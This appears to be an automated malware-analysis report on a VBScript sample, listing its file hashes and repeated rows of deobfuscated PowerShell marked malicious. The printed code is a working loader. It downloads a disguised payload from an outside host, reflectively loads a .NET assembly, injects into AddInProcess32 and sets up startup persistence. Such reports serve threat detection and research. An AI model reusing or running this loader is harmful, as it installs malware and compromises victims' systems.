|
Hash | Hash Value |
|---|---|
| MD5 | 381ebfe118ddde9f4b3a38d786c875dd
|
| Sha1 | 894a7311aecb2090e8c3d8bec4bf42c207093a11
|
| Sha256 | 6bc677ac4c36cb99e3170edb2b29b8e8b47399a2896f8f0c6fa998b4337bcf35
|
| Sha384 | f5ab4eb3bfd38e9b463750399b14d1dbc59f5503f23ea6c12c24a888ebe9a045909965ea22dcf9e5c6e1135d558498e1
|
| Sha512 | 8eab6601d80ea76796a16bcf92fd1a232d422b4e5eb24617b4f967bd04139f6210ddad681494ea8b7d2e175c43cce3e91f286203eaeea3bee9a9abebbd98018d
|
| SSDeep | 768:BIGpjh4Pjt4CivtRRpAkkLuZC2KjIibBsD8eFxWirbfUsx6:BI4CivtrfHKZbBM8etrb8o6
|
| TLSH | BF73758BF9D7A262831B64C120D2208714714E70E2365D5FBC4C5F7DAB9CFB8A366789
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8va2F0eWFjaGUuY29tL3VwbG9hZHMvb3B0aW1pemVkX01TSS5wbmcnKSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1TW5idmxHZGhSM2NsWldhdUZXYjVoR2RzRldaMzl5Y2tGMmJzQlhkdjAyYmo1U1pvTldZNVJYWXI5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnQWRkSW5Qcm9jZXNzMzInLCcnLCdBZGRJblByb2Nlc3MzMicsJycsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://katyache.com/uploads/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduMnbvlGdhR3clZWauFWb5hGdsFWZ39yckF2bsBXdv02bj5SZoNWY5RXYr9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://katyache.com/uploads/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduMnbvlGdhR3clZWauFWb5hGdsFWZ39yckF2bsBXdv02bj5SZoNWY5RXYr9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8va2F0eWFjaGUuY29tL3VwbG9hZHMvb3B0aW1pemVkX01TSS5wbmcnKSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1TW5idmxHZGhSM2NsWldhdUZXYjVoR2RzRldaMzl5Y2tGMmJzQlhkdjAyYmo1U1pvTldZNVJYWXI5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnQWRkSW5Qcm9jZXNzMzInLCcnLCdBZGRJblByb2Nlc3MzMicsJycsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
381ebfe118ddde9f4b3a38d786c875dd |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8va2F0eWFjaGUuY29tL3VwbG9hZHMvb3B0aW1pemVkX01TSS5wbmcnKSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1TW5idmxHZGhSM2NsWldhdUZXYjVoR2RzRldaMzl5Y2tGMmJzQlhkdjAyYmo1U1pvTldZNVJYWXI5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnQWRkSW5Qcm9jZXNzMzInLCcnLCdBZGRJblByb2Nlc3MzMicsJycsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression" Malicious |
381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://katyache.com/uploads/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduMnbvlGdhR3clZWauFWb5hGdsFWZ39yckF2bsBXdv02bj5SZoNWY5RXYr9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) Malicious |
381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://katyache.com/uploads/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduMnbvlGdhR3clZWauFWb5hGdsFWZ39yckF2bsBXdv02bj5SZoNWY5RXYr9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) Malicious |
381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8va2F0eWFjaGUuY29tL3VwbG9hZHMvb3B0aW1pemVkX01TSS5wbmcnKSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1TW5idmxHZGhSM2NsWldhdUZXYjVoR2RzRldaMzl5Y2tGMmJzQlhkdjAyYmo1U1pvTldZNVJYWXI5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnQWRkSW5Qcm9jZXNzMzInLCcnLCdBZGRJblByb2Nlc3MzMicsJycsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression" Malicious |
381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |